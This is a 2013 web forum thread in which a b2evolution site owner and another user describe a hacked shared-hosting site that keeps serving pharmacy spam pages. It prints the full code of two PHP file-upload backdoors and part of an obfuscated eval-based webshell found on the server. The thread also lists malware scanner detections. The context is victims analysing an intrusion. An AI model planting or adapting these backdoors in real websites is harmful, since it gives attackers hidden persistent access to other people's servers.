Recent Topics

1 Nov 07, 2013 15:08    

I became aware of the fact that if one goes to mysite.com/doc - a pharmacy site page opens. Mysite.com is powered by b2evolution 4.1.7 (was 4.0.5 prior to the hack).

The /doc directory contains some CSS and HTML files. The question is, how did they get there?

Here are some relevant details:

  • I'm using shared hosting on Bluehost
  • After discovering the `doc` directory, I changed its permissions to 000 and shortly after that, another directory showed up - `doc3`, containing the same pharma store
  • Upon discovering that, I thought it is an unpatched problem in 4.0.5, so I upgraded to 4.1.7 - but in a few hours, the pharma site was back
  • I compared the directories of my freshly upgraded 4.1.7 with the one that is hacked and there are no differences in the files, nor there are new files, except: images in the /media directory, the `doc` directory itself, and the plugins I installed: akismet, recaptcha, google_analytics
  • When I was upgrading to 4.1.7, the install URL had an unusual thing in it: `mysite.com/install/index.php?[b]dasya=true[/b]`. I didn't really pay attention to that, but I remember it wasn't there in earlier versions (and I've been using b2evo since 1.x days). It seems to be some form of malware, because there are a few other hits about it online - but nothing substantial, just people asking about what it is; no solutions or explanations so far.

While examining the previous snapshot of the hacked 4.0.5, I discovered:

  • ext.php in the root directory, which was a file uploading interface - the files would go straight to the root directory
  • a hidden file called `.thumbs_up.php` in the `/media/blogs/a` directory (where my images go)
  • a file called `readmed.php` in the google_analytics_plugin

There are multiple domains hosted on the same Bluehost account, and only of them gets compromised (even though another one is also running b2evolution too (v 3.3.3), in a different subdirectory.

Perhaps there is a server-side problem, not related to b2evo itself; but then... why are other directories not affected? At this point I have quite a lot of different clues, but nothing to glue them together yet. Any help will be greatly appreciated.

body of ext.php (prettified, originally it was a single line thing)

<?php
error_reporting(0);
@ini_set("display_errors", 0);
$var = $_SERVER['PHP_SELF'] . "?";
$form = '<form enctype="multipart/form-data" action="' . $var . '" method="POST"><input name="uploadFile" type="file"/><br/><input type="submit" value="Upload" /></form>';

if (!empty($_FILES['uploadFile']))
{
$self = dirname(__FILE__);
move_uploaded_file($_FILES["uploadFile"]["tmp_name"], $self . DIRECTORY_SEPARATOR . $_FILES["uploadFile"]["name"]);
$time = filemtime($self);
print "OK";
}
else
{
print $form;
} ?>

body of .thumbs_up.php

<?php 
$auth_pass = "8a4bf282852bf4c49e17f0951f645e72"; 
$color = "#df5"; 
$default_action = "FilesMan"; 
$default_charset = "Windows-1251"; 
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x6
...
<snip>
...
Lq9x9Gt4uJYexm3ORT3UDtmLVhx5X4qm/OcBsLu8rUirk72Onl5tBjNRCty4s8Uh1VQKxLg+xQC0T93+IV4sxw/c08okR1wKtoyadLX6Dl6tDg3WxVxFoHhkj6Yn/xc='\x29\x29\x29\x3B","."); 
?>

body of readmed.php

<?php error_reporting(0);
@ini_set("display_errors", 0);

$var= $_SERVER['PHP_SELF']."?".$_SERVER['QUERY_STRING'];
$md5RandomPass  = "6c11824f3cbe6d65396edd61c0d27c47";
$form =<<<HTML
<form enctype="multipart/form-data" action="$var" method="POST">
<input name="uploadFile" type="file"/><br/>
<input type="submit" value="Upload" />
</form>
HTML;
if (md5($_REQUEST['pass']) != $md5RandomPass) {
exit();
}
if (!empty($_FILES['uploadFile'])) {
$self        = dirname(__FILE__);
move_uploaded_file($_FILES["uploadFile"]["tmp_name"], $self.DIRECTORY_SEPARATOR.$_FILES["uploadFile"]["name"]);

$time        = filemtime($self );
touch($self.DIRECTORY_SEPARATOR.$_FILES["uploadFile"]["name"], $time);
print "OK";
} else {
print $form;
} ?>

2 Nov 13, 2013 23:07

I wish I could answer how they got there because I had a similar issue within the past week with my host, Netfirms.

A non-active but still online version of 1.9.3 was suddenly found to have been compromised with a couple of rogue PHP scripts:

/public_html/xxxxxxxxxx/BLOGS-1.9.3/media/blogs/214473.php: SiteLock-PHP-BACKDOOR-GENERIC-md5-fz.UNOFFICIAL FOUND
/public_html/xxxxxxxxxx/BLOGS-1.9.3/skins/custom/img/63766.php: SiteLock-PHP-BACKDOOR-GENERIC-md5-fz.UNOFFICIAL FOUND

Another active site running B2 5.06 was also somehow infected with .Thumbs_up.

/public_html/yyyyyyyyyy/media/shared/global/logos/.thumbs_up.php: SiteLock-PHP-C99-WEBSHELL-1-b.UNOFFICIAL FOUND

I deleted the files and a couple of unused FTP accounts and have not had trouble since (knock wood). Makes me wonder if someone left a backdoor open somewhere.

3 Nov 14, 2013 10:55

Hi,

I can tell you that it is most likely not going to solve the problem - the scripts will be there again after a while, you've merely removed the symptoms, but not the cause.

1. Do you use other CMSes on the same server? If yes, perhaps one of them could be the original source of the problem?
2. Does Netfirms also use CPanel (like Bluehost)? (maybe it is a CPanel issue?)

Sadly, I have to say that after deleting these files, they show up again shortly, so I am still in search of answers.

4 Nov 15, 2013 14:26

There's a Joomla install that's in maintenance mode, but other than that it's only B2.

NetFirms has its own control panel.

I haven't looked through every folder, but so I've not been notified of any questionable pages or scripts.


Form is loading...